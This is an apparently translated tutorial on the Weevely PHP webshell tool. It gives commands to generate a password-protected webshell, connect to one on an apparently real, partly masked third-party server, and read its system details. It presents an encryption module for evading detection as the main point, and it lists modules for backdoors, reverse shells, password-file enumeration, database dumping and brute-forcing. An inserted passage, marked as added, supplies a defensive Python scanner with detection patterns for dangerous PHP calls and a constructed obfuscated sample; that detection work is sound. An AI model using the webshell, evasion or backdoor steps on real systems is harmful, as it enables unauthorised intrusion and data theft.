Weevely is a webshell backdoor connection tool that ships with BT5. It plays a role similar to Chopper.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
// Generate a PHP webshell whose password is ices.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices
// Usage: ./weevely.py http://*.com/webshell.php [password] connects to the webshell.
apache@hqebwebj:/app/ecccs/web/common $ :system.info
// Press the Tab key twice to enter control mode; for example, :system.info retrieves system information.
whoami: apache
hostname: hqebwebj
basedir: /app/ecccs/web/common
uname: Linux hqebwebj 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux
os: Linux
document_root: /home/ecccs/web
safe_mode: 0
script: /common/gen.php
client_ip: 120.3*.56.156
max_execution_time: 30
php_self: /common/gen.php
apache@hqebwebj:/app/ecccs/web/common $ cat /etc/issue
Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel
// Ordinary shell commands can be run directly as well.
Encryption
Cold Nights extracted Weevely's PHP encryption module (this is in fact the highlight of this article: it is used to make the webshell evade detection).
$ python test.py original.php password.php
In the encrypted webshell code, for example, only the well-known str_replace function appears and no other keyword, which makes it very hard to detect and remove.
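Because such a shell shows no keyword beyond str_replace, a defender cannot rely on keyword lists alone. The scanner below, an added example that is not part of the original article or of Weevely, flags PHP files in which a function name is assembled at runtime (by str_replace or by concatenating short string fragments) and then invoked through a variable; the PHP samples are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# The obfuscated shell described above shows no keyword except str_replace, so the
# signal is not a function name but a name that is built at runtime and then invoked.
ASSIGN_STR_REPLACE = re.compile(r"\$(\w+)\s*=\s*str_replace\s*\(")
ASSIGN_FRAGMENTS = re.compile(r"\$(\w+)\s*=\s*(?:['\"][^'\"]{1,3}['\"]\s*\.\s*){2,}['\"]")
VARIABLE_CALL = re.compile(r"\$(\w+)\s*\(")  # PHP calls the function whose name is in $var
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
DANGEROUS = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|base64_decode)\s*\(")
WEIGHTS = {"built_name_invoked": 5, "dangerous_call": 3, "request_input": 1}

def scan_php(source: str) -> dict:
    """Score one PHP source string; 'suspicious' means it deserves a manual look."""
    findings = []
    built = {m.group(1) for m in ASSIGN_STR_REPLACE.finditer(source)}
    built |= {m.group(1) for m in ASSIGN_FRAGMENTS.finditer(source)}
    invoked = {m.group(1) for m in VARIABLE_CALL.finditer(source)}
    for name in sorted(built & invoked):  # an assembled name is actually called
        findings.append(("built_name_invoked", name))
    for m in DANGEROUS.finditer(source):
        findings.append(("dangerous_call", m.group(1)))
    if REQUEST_INPUT.search(source):
        findings.append(("request_input", "superglobal"))
    score = sum(WEIGHTS[kind] for kind, _ in findings)
    return {"score": score, "findings": findings, "suspicious": score >= 4}

def scan_tree(root: str) -> list:
    """Return [(path, result)] for every suspicious .php file under root."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        result = scan_php(path.read_text(errors="replace"))
        if result["suspicious"]:
            hits.append((str(path), result))
    return hits

# Constructed samples (not Weevely output): ordinary str_replace use versus a
# function name assembled at runtime and then called through a variable.
BENIGN_PHP = "<?php\n$slug = str_replace(' ', '-', strtolower($title));\necho $slug;\n"
OBFUSCATED_PHP = "<?php\n$f = str_replace('q', '', 'sqtrqtoqupqper');\necho $f($_GET['name']);\n"

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PHP), ("obfuscated", OBFUSCATED_PHP)):
        print(label, scan_php(src))
    for path, result in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, result["score"], result["findings"])
```

Run it against a web root to list files worth reviewing; the heuristics are deliberately narrow, so treat the score as a triage hint rather than a verdict.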
Function modules
system.info // collect system information
file.read // read a file
file.upload // upload a local file
file.check // check file permissions
file.enum // enumerate remote files listed in a local wordlist
file.download // download remote binary/ASCII files to the local machine
sql.query // execute an SQL query
sql.console // start an SQL console
sql.dump // dump an SQL database
sql.summary // list the tables and columns of an SQL database
backdoor.tcp // TCP port backdoor
backdoor.install // install a backdoor
backdoor.reverse_tcp // reverse TCP connection
audit.user_files // list common sensitive files in users' home directories
audit.user_web_files // list common web files
audit.etc_passwd // enumerate /etc/passwd
find.webdir // find writable web directories
find.perm // find readable/writable/executable files and directories
find.name // find files and directories by name
find.suidsgid // find SUID/SGID files and directories
bruteforce.sql // brute-force the password of a single SQL user
bruteforce.sql_users // brute-force SQL passwords for a list of users
bruteforce.ftp // brute-force the password of a single FTP user
bruteforce.ftp_users // brute-force FTP passwords for a list of users
Weevely, the Chopper for Linux